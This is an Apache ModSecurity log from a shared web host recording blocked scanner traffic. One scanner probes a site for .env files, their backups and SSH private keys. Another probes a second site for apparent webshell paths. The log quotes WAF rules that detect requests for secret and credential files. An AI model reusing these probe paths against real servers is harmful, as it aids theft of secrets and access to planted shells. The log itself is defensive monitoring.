[Tue May 26 12:54:36.165051 2026] [security2:error] [pid 461618:tid 461807] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKs1yiSlSCHr1fdr20igAAAMA"]
[Tue May 26 12:54:36.329986 2026] [security2:error] [pid 461618:tid 461853] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtFyiSlSCHr1fdr20mwAAAO4"]
[Tue May 26 12:54:37.654646 2026] [security2:error] [pid 461618:tid 461865] [client 85.121.55.185:60522] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.env"] [unique_id "ahVKtVyiSlSCHr1fdr203QAAAPo"]
[Tue May 26 12:54:37.656200 2026] [security2:error] [pid 461618:tid 461768] [client 85.121.55.185:60544] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/api/.env"] [unique_id "ahVKtVyiSlSCHr1fdr204wAAAJk"]
[Tue May 26 12:54:37.657121 2026] [security2:error] [pid 461618:tid 461830] [client 85.121.55.185:60552] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/public/.env"] [unique_id "ahVKtVyiSlSCHr1fdr205AAAANc"]
[Tue May 26 12:54:37.658539 2026] [security2:error] [pid 461618:tid 461864] [client 85.121.55.185:60548] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/backend/.env"] [unique_id "ahVKtVyiSlSCHr1fdr204QAAAPk"]
[Tue May 26 12:54:37.683526 2026] [security2:error] [pid 461618:tid 461786] [client 85.121.55.185:60558] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.ssh/id_dsa"] [unique_id "ahVKtVyiSlSCHr1fdr208QAAAKs"]
[Tue May 26 12:54:37.767701 2026] [security2:error] [pid 461618:tid 461849] [client 85.121.55.185:60580] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr203wAAAOo"]
[Tue May 26 12:54:37.783580 2026] [security2:error] [pid 461618:tid 461825] [client 85.121.55.185:60574] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr207QAAANI"]
[Tue May 26 12:54:37.784152 2026] [security2:error] [pid 461618:tid 461804] [client 85.121.55.185:60578] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr207AAAAL0"]
[Tue May 26 12:54:37.784243 2026] [security2:error] [pid 461618:tid 461773] [client 85.121.55.185:60568] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr203gAAAJ4"]
[Tue May 26 12:54:37.790184 2026] [security2:error] [pid 461618:tid 461821] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr206QAAAM4"]
[Tue May 26 12:54:37.792057 2026] [security2:error] [pid 461618:tid 461846] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr206AAAAOc"]
[Tue May 26 12:54:37.815825 2026] [security2:error] [pid 461618:tid 461851] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr209AAAAOw"]
[Tue May 26 12:54:37.816744 2026] [security2:error] [pid 461618:tid 461861] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr209QAAAPY"]
[Tue May 26 12:54:37.830353 2026] [security2:error] [pid 461618:tid 461786] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtVyiSlSCHr1fdr208wAAAKs"]
[Tue May 26 12:54:38.171366 2026] [security2:error] [pid 461618:tid 461794] [client 85.121.55.185:60554] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:id_(?:r|d)sa$|key\\\\.pem$|(?:myserver|private-?key)\\\\.key$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1291"] [id "350591"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access raw Private cryto keys"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.ssh/id_rsa"] [unique_id "ahVKtlyiSlSCHr1fdr21BwAAALM"]
[Tue May 26 12:54:38.183896 2026] [security2:error] [pid 461618:tid 461763] [client 85.121.55.185:60536] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.env.old"] [unique_id "ahVKtlyiSlSCHr1fdr21FgAAAJQ"]
[Tue May 26 12:54:38.189660 2026] [security2:error] [pid 461618:tid 461823] [client 85.121.55.185:60534] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.env.bak"] [unique_id "ahVKtlyiSlSCHr1fdr21FAAAANA"]
[Tue May 26 12:54:38.197302 2026] [security2:error] [pid 461618:tid 461852] [client 85.121.55.185:60532] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/.env.backup"] [unique_id "ahVKtlyiSlSCHr1fdr21MQAAAO0"]
[Tue May 26 12:54:38.197756 2026] [security2:error] [pid 461618:tid 461749] [client 85.121.55.185:60550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "moes-art.com"] [uri "/app/.env"] [unique_id "ahVKtlyiSlSCHr1fdr21LwAAAIY"]
[Tue May 26 12:54:38.268953 2026] [security2:error] [pid 461618:tid 461860] [client 20.9.81.163:9613] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVKtlyiSlSCHr1fdr21PgAAAPU"]
[Tue May 26 12:54:38.269106 2026] [security2:error] [pid 461618:tid 461860] [client 20.9.81.163:9613] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahVKtlyiSlSCHr1fdr21PgAAAPU"]
[Tue May 26 12:54:38.311377 2026] [security2:error] [pid 461618:tid 461853] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21BAAAAO4"]
[Tue May 26 12:54:38.319863 2026] [security2:error] [pid 461618:tid 461857] [client 85.121.55.185:60560] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21FwAAAPI"]
[Tue May 26 12:54:38.321747 2026] [security2:error] [pid 461618:tid 461865] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21KwAAAPo"]
[Tue May 26 12:54:38.331677 2026] [security2:error] [pid 461618:tid 461757] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21EQAAAI4"]
[Tue May 26 12:54:38.335648 2026] [security2:error] [pid 461618:tid 461778] [client 85.121.55.185:60510] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21EwAAAKM"]
[Tue May 26 12:54:38.352083 2026] [security2:error] [pid 461618:tid 461781] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21FQAAAKY"]
[Tue May 26 12:54:38.352664 2026] [security2:error] [pid 461618:tid 461847] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21NAAAAOg"]
[Tue May 26 12:54:38.355528 2026] [security2:error] [pid 461618:tid 461795] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21HgAAALQ"]
[Tue May 26 12:54:38.357292 2026] [security2:error] [pid 461618:tid 461766] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21JQAAAJc"]
[Tue May 26 12:54:38.359816 2026] [security2:error] [pid 461618:tid 461834] [client 85.121.55.185:60514] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21EgAAANs"]
[Tue May 26 12:54:38.361120 2026] [security2:error] [pid 461618:tid 461768] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21JgAAAJk"]
[Tue May 26 12:54:38.368966 2026] [security2:error] [pid 461618:tid 461835] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21NQAAANw"]
[Tue May 26 12:54:38.369034 2026] [security2:error] [pid 461618:tid 461774] [client 85.121.55.185:60572] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21LQAAAJ8"]
[Tue May 26 12:54:38.376154 2026] [security2:error] [pid 461618:tid 461765] [client 85.121.55.185:60582] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21MgAAAJY"]
[Tue May 26 12:54:38.386355 2026] [security2:error] [pid 461618:tid 461855] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21JwAAAPA"]
[Tue May 26 12:54:38.391375 2026] [security2:error] [pid 461618:tid 461748] [client 85.121.55.185:60570] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21LgAAAIU"]
[Tue May 26 12:54:38.393493 2026] [security2:error] [pid 461618:tid 461753] [client 85.121.55.185:60576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21RwAAAIo"]
[Tue May 26 12:54:38.393871 2026] [security2:error] [pid 461618:tid 461801] [client 20.9.81.163:31447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/admin.php"] [unique_id "ahVKtlyiSlSCHr1fdr21SQAAALo"]
[Tue May 26 12:54:38.393951 2026] [security2:error] [pid 461618:tid 461801] [client 20.9.81.163:31447] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/admin.php"] [unique_id "ahVKtlyiSlSCHr1fdr21SQAAALo"]
[Tue May 26 12:54:38.398305 2026] [security2:error] [pid 461618:tid 461849] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21QAAAAOo"]
[Tue May 26 12:54:38.398828 2026] [security2:error] [pid 461618:tid 461818] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21PQAAAMs"]
[Tue May 26 12:54:38.399052 2026] [security2:error] [pid 461618:tid 461814] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21PAAAAMc"]
[Tue May 26 12:54:38.405921 2026] [security2:error] [pid 461618:tid 461825] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21QwAAANI"]
[Tue May 26 12:54:38.406347 2026] [security2:error] [pid 461618:tid 461862] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21QQAAAPc"]
[Tue May 26 12:54:38.412323 2026] [security2:error] [pid 461618:tid 461870] [client 85.121.55.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21RgAAAP8"]
[Tue May 26 12:54:38.535231 2026] [security2:error] [pid 461618:tid 461764] [client 20.9.81.163:38008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/inputs.php"] [unique_id "ahVKtlyiSlSCHr1fdr21SgAAAJU"]
[Tue May 26 12:54:38.535377 2026] [security2:error] [pid 461618:tid 461764] [client 20.9.81.163:38008] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/inputs.php"] [unique_id "ahVKtlyiSlSCHr1fdr21SgAAAJU"]
[Tue May 26 12:54:38.675914 2026] [security2:error] [pid 461618:tid 461815] [client 20.9.81.163:32720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/file.php"] [unique_id "ahVKtlyiSlSCHr1fdr21TgAAAMg"]
[Tue May 26 12:54:38.676053 2026] [security2:error] [pid 461618:tid 461815] [client 20.9.81.163:32720] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/file.php"] [unique_id "ahVKtlyiSlSCHr1fdr21TgAAAMg"]
[Tue May 26 12:54:38.829939 2026] [security2:error] [pid 461618:tid 461844] [client 20.9.81.163:34046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/ms-edit.php"] [unique_id "ahVKtlyiSlSCHr1fdr21VQAAAOU"]
[Tue May 26 12:54:38.830114 2026] [security2:error] [pid 461618:tid 461844] [client 20.9.81.163:34046] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/ms-edit.php"] [unique_id "ahVKtlyiSlSCHr1fdr21VQAAAOU"]
[Tue May 26 12:54:39.025342 2026] [security2:error] [pid 461618:tid 461841] [client 20.9.81.163:34008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/simple.php"] [unique_id "ahVKt1yiSlSCHr1fdr21WQAAAOI"]
[Tue May 26 12:54:39.025461 2026] [security2:error] [pid 461618:tid 461841] [client 20.9.81.163:34008] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/simple.php"] [unique_id "ahVKt1yiSlSCHr1fdr21WQAAAOI"]
[Tue May 26 12:54:39.229279 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:34038] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/bgymj.php"] [unique_id "ahVKt1yiSlSCHr1fdr21YgAAAJk"]
[Tue May 26 12:54:39.229382 2026] [security2:error] [pid 461618:tid 461768] [client 20.9.81.163:34038] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/bgymj.php"] [unique_id "ahVKt1yiSlSCHr1fdr21YgAAAJk"]
[Tue May 26 12:54:39.365409 2026] [security2:error] [pid 461618:tid 461847] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVKtlyiSlSCHr1fdr21WAAAAOg"]
[Tue May 26 12:54:39.374326 2026] [security2:error] [pid 461618:tid 461756] [client 20.9.81.163:29886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVKt1yiSlSCHr1fdr21agAAAI0"]
[Tue May 26 12:54:39.374426 2026] [security2:error] [pid 461618:tid 461756] [client 20.9.81.163:29886] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahVKt1yiSlSCHr1fdr21agAAAI0"]
[Tue May 26 12:54:39.511221 2026] [security2:error] [pid 461618:tid 461748] [client 20.9.81.163:1274] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/404.php"] [unique_id "ahVKt1yiSlSCHr1fdr21bgAAAIU"]
[Tue May 26 12:54:39.511400 2026] [security2:error] [pid 461618:tid 461748] [client 20.9.81.163:1274] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "azurmediatec.com"] [uri "/404.php"] [unique_id "ahVKt1yiSlSCHr1fdr21bgAAAIU"]
[Tue May 26 12:54:39.655834 2026] [security2:error] [pid 461618:tid 461840] [client 20.9.81.163:31425] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 163.81.9.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "azurmediatec.com"] [uri "/file3.php"] [unique_id "ahVKt1yiSlSCHr1fdr21bwAAAOE"]
